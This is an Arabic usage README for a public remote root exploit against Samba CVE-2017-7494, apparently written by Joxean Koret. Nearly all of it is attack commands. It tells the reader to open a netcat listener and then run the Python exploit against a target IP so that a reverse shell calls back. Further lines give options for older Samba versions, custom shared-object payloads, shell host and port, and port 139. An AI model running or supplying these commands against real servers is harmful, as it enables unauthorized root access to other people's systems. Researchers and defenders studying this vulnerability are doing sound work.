
استغلال عن بُعد بصلاحيات الجذر لثغرة SAMBA CVE-2017-7494
استغلال يمنح صلاحيات الجذر عن بُعد لثغرة SAMBA CVE-2017-7494.
ينقسم هذا الاستغلال إلى جزأين:
طالما أن الهدف معرّض للثغرة والحمولة مناسبة لنظام التشغيل والمعمارية للهدف، فإن الاستغلال موثوق بنسبة 100%.
على جهازك، شغّل الأمر التالي:
$ nc -p 31337 -l
ثم شغّل الاستغلال ضد هدفك وانتظر حتى يتصل مرة أخرى بـ Netcat الخاص بك:
$ python cve_2017_7494.py -t target_ip
إذا أغلقت الشل العكسي بسرعة كبيرة، فبدلاً من إعادة تشغيل الاستغلال لرفع الوحدة، إلخ... يمكنك ببساطة تمرير مسار الوحدة التي تم رفعها مسبقًا. بافتراض أنه تم رفعها إلى /shared/directory/ باسم "module.so"، يمكنك تشغيل أمر مثل الأمر التالي:
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
يمكنك الآن تشغيل الاستغلال ضد samba 3.5.0 و3.6.0، فقط تحتاج إلى إضافة الوسيط -o 1
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
يمكنك الآن استخدام ملف .so المخصص الخاص بك:
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
إذا احتجت إلى تشغيل هذا السكربت من جهاز x86، فإن تجميع ملفات implant الثنائية سينشئ ملفين x86. باستخدام الخيار -n 1 يمكنك تعطيل التجميع ونسخ libimplantx64.so من جهاز آخر.
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
إذا كان samba يعمل فقط على المنفذ 139. يمكنك ضبط منفذ الخادم البعيد باستخدام الوسيط -p
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
لم أعد أدعمه بعد الآن.
-- Joxean Koret